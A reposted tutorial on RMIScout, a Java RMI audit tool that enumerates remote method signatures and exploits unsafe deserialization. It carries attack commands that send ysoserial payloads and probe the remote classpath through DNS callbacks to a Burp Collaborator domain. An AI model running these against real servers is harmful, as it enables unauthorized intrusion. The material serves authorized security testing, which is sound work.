How to use RMIScout

2025-01-18 update. From: SLTechnology News&Howtos > Network Security

Shulou (shulou.com), 05/31 report

This article introduces RMIScout, a security audit tool for Java RMI, and walks through its modes of operation: wordlist and brute-force enumeration of remote method signatures, exploitation of unsafe argument unmarshalling, and probing of the remote classpath.

RMIScout

RMIScout is a security audit tool for Java RMI. It enumerates Java RMI methods using wordlist and brute-force strategies and exploits unsafe RMI parameter unmarshalling (deserialization) vulnerabilities. It performs wordlist and brute-force attacks against exposed Java RMI interfaces to safely guess method signatures without invoking the methods themselves.

On a misconfigured server, any known RMI method signature that takes a non-primitive type (for example java.lang.String) can be exploited by replacing that argument with a serialized payload. This misconfiguration is fairly common; examples include VMware vSphere Data Protection + vRealize Operations Manager, Pivotal tc Server and Gemfire, and Apache Karaf + Cassandra.

RMIScout integrates with ysoserial and GadgetProbe to perform deserialization attacks against services that are not correctly protected by a process-wide deserialization filter (JEP 290).

Features

1. Wordlist and text-based brute-force strategies instead of brute-forcing the 64-bit method hash

2. Identifies RMI methods without invoking them

3. A simple way to exploit known unsafe RMI parameter unmarshalling vulnerabilities, using ysoserial payloads or a custom ysoserial.payloads.ObjectPayload

4. Integrates GadgetProbe to identify classes on the remote classpath, which helps fingerprint the software in use and build gadget chains

To get started, use the lists/prototypes.txt wordlist shipped with the tool, which contains more than 15,000 RMI method prototypes.

Working mechanism

To identify RMI methods without executing them, RMIScout uses low-level RMI networking and dynamic class generation to send RMI invocations with deliberately mismatched argument types that trigger a remote exception. Every parameter is replaced with a dynamically generated serializable class whose 255-character name is assumed not to exist on the remote classpath. For example:

Remote interface: void login(String user, String password)

RMIScout will call: login((String) new QQkzkn3..255 chars..(), (String) new QQkzkn3..255 chars..())

If the method exists, the server throws a java.rmi.UnmarshalException caused by a ClassNotFoundException while unmarshalling the arguments, before the underlying method implementation is ever invoked. A call to a method that does not exist fails earlier, at the method-hash lookup, and produces a different error, so the two outcomes can be told apart.
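The following is an added example written for this article; it is not code from RMIScout or from the original page. It shows what the "64-bit method hash" from the feature list actually is: the JRMP server matches this hash before it unmarshals any argument, which is why the prototype (name, parameter types and return type) has to be guessed exactly and why RMIScout searches a prototype wordlist rather than the 2^64 hash space. The hash algorithm is assumed to follow the JDK's sun.rmi.server.Util.computeMethodHash (SHA-1 over the DataOutputStream.writeUTF encoding of "name(paramDescriptors)returnDescriptor", first 8 digest bytes read as a little-endian long); the prototypes and the bruteforce_candidates helper are constructed here for illustration and mirror, but are not, the tool's own code.

```python
"""Added example (not code from RMIScout or the original article).

Maps a Java RMI method prototype to the 64-bit method hash a JRMP server
matches before unmarshalling arguments, and counts how many prototypes a
wordlist / brute-force run has to cover.

Assumption (not stated on the page): the hash follows the JDK's
sun.rmi.server.Util.computeMethodHash -- SHA-1 over the writeUTF encoding of
"name(paramDescriptors)returnDescriptor", first 8 bytes as a little-endian long.
All prototypes below are constructed for illustration.
"""
import hashlib
import itertools
import re
import struct

# JVM descriptor letters for primitive types; everything else is an object type.
PRIMITIVES = {
    "void": "V", "boolean": "Z", "byte": "B", "char": "C", "short": "S",
    "int": "I", "long": "J", "float": "F", "double": "D",
}

# Unqualified java.lang names, as wordlists usually write them (e.g. "String").
JAVA_LANG = {"String", "Object", "Integer", "Long", "Boolean", "Double",
             "Float", "Short", "Byte", "Character", "Throwable", "Exception"}


def type_descriptor(java_type: str) -> str:
    """'java.lang.String' -> 'Ljava/lang/String;', 'int[]' -> '[I'.
    Generic arguments are erased; the JVM descriptor does not carry them."""
    java_type = re.sub(r"<.*>", "", java_type).strip()
    dims = 0
    while java_type.endswith("[]"):
        dims += 1
        java_type = java_type[:-2].strip()
    if java_type in PRIMITIVES:
        base = PRIMITIVES[java_type]
    else:
        if "." not in java_type and java_type in JAVA_LANG:
            java_type = "java.lang." + java_type
        base = "L" + java_type.replace(".", "/") + ";"
    return "[" * dims + base


_PROTO_RE = re.compile(r"^\s*(\S+)\s+(\w+)\s*\((.*)\)\s*$")


def parse_prototype(prototype: str):
    """'void login(java.lang.String user, int n)' -> ('void', 'login',
    ['java.lang.String', 'int']). Parameter names are optional and ignored."""
    m = _PROTO_RE.match(prototype)
    if not m:
        raise ValueError(f"not a method prototype: {prototype!r}")
    ret, name, params = m.groups()
    ptypes = [p.split()[0] for p in (s.strip() for s in params.split(",")) if p]
    return ret, name, ptypes


def name_and_descriptor(prototype: str) -> str:
    """The string the JDK hashes: method name plus JVM method descriptor."""
    ret, name, ptypes = parse_prototype(prototype)
    return name + "(" + "".join(type_descriptor(t) for t in ptypes) + ")" + type_descriptor(ret)


def hash_from_descriptor(name_desc: str) -> int:
    """SHA-1 over writeUTF framing (2-byte big-endian length + UTF-8 bytes);
    the first 8 digest bytes are read as a little-endian unsigned 64-bit value."""
    data = name_desc.encode("utf-8")
    digest = hashlib.sha1(struct.pack(">H", len(data)) + data).digest()
    return int.from_bytes(digest[:8], "little")


def rmi_method_hash(prototype: str) -> int:
    """64-bit RMI method hash carried in a JRMP call (opnum -1 protocol)."""
    return hash_from_descriptor(name_and_descriptor(prototype))


def bruteforce_candidates(methods, return_types, param_types, min_params, max_params):
    """Enumerate prototypes the way a brute-force mode does: every method name
    crossed with every return type and every parameter-type tuple whose length
    lies in [min_params, max_params]."""
    for name in methods:
        for ret in return_types:
            for n in range(min_params, max_params + 1):
                for combo in itertools.product(param_types, repeat=n):
                    yield f"{ret} {name}({', '.join(combo)})"


if __name__ == "__main__":
    # Constructed sample wordlist, one prototype per line.
    wordlist = [
        "void login(java.lang.String user, java.lang.String password)",
        "boolean isAdmin(String user)",
        "java.lang.Object[] listEntries(int page, int pageSize)",
    ]
    for proto in wordlist:
        print(f"{rmi_method_hash(proto):#018x}  {name_and_descriptor(proto)}")

    # Same search shape as: bruteforce -r void,boolean,long -p String,int -l 1,4
    n = sum(1 for _ in bruteforce_candidates(["login", "exec"], ["void", "boolean", "long"],
                                             ["String", "int"], 1, 4))
    print(f"{n} candidate prototypes versus 2**64 possible hashes")
```

Two practical consequences follow from the hash covering the whole descriptor. First, a wordlist entry with the right name and parameters but the wrong return type hashes to a different value and is never matched, which is why the brute-force mode takes a list of return types rather than assuming void. Second, the hash is matched before any argument is deserialized, so a correct guess with the bogus 255-character argument class reaches the ClassNotFoundException path and nothing further; an incorrect guess never gets past the lookup.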

A complete technical write-up is published by Bishop Fox, the tool's authors, and linked from the project repository.

Tool download

Clone the project source code locally with git:

git clone https://github.com/BishopFox/rmiscout.git

Run a wordlist attack against a remote RMI service using the function prototype dictionary (the target host and port are the last two arguments; 127.0.0.1 1099 is used in these examples):

./rmiscout.sh wordlist -i lists/prototypes.txt 127.0.0.1 1099

Run a brute-force attack using a method-name dictionary together with the return types, parameter types and parameter counts (here 1 to 4) to combine:

./rmiscout.sh bruteforce -i lists/methods.txt -r void,boolean,long -p String,int -l 1,4 127.0.0.1 1099

Invoke a known signature with the specified ysoserial payload and payload argument; the object-typed parameter is replaced with the serialized payload, and -n names the object bound in the registry:

./rmiscout.sh exploit -s 'void vulnSignature(java.lang.String a, int b)' -p ysoserial.payloads.URLDNS -c "http://examplesubdomain.burpcollaborator.net" -n registryName 127.0.0.1 1099

Brute-force the remote classpath with GadgetProbe and a known signature (hits are observed as DNS callbacks to the given domain):

./rmiscout.sh probe -s 'void vulnSignature(java.lang.String a, int b)' -i ./GadgetProbe/wordlists/maven_popular.list -d "examplesubdomain.burpcollaborator.net" -n registryName 127.0.0.1 1099

Build and run

The project is built by the included rmiscout.sh wrapper script, which wraps the java -jar invocation:

./rmiscout.sh wordlist -i lists/prototypes.txt 127.0.0.1 1099

Alternatively, build the JAR manually and run it with a plain java -jar command:

# Manually build the JAR
./gradlew shadowJar
java -jar build/libs/rmiscout-1.01-SNAPSHOT-all.jar wordlist -i lists/prototypes.txt 127.0.0.1 1099

Tool use

Start the bundled RMI demo server and run the tool against it with the demo/wordlist.txt dictionary:

cd demo
./start.sh

That concludes this introduction to RMIScout. Combining the explanation above with hands-on practice against the demo server is the best way to learn the tool.
